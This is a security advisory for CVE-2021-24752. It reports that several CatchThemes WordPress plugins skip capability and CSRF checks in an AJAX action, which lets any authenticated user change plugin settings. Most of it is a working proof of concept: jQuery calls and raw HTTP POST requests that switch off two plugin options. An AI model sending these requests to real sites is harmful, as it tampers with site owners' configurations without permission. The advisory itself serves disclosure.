Multiple Plugins from CatchThemes – Unauthorised Plugin's Setting Change | CVE 2021-24752

Description

Multiple Plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated users, such as Subscriber to change the plugin's configurations.

Proof of Concept

1) Turn off "Turn On Catch Themes & Catch Plugin tabs"

jQuery.post(ajaxurl,{
action:"ctp_switch",
option_name:"theme_plugin_tabs",
value:"false"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]

action=ctp_switch&option_name=theme_plugin_tabs&value=false

2) Turn off "EW: Authors"

jQuery.post(ajaxurl,{
action:"ew_switch",
option_name:"ew_authors",
value:"false"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]

action=ew_switch&option_name=ew_authors&value=false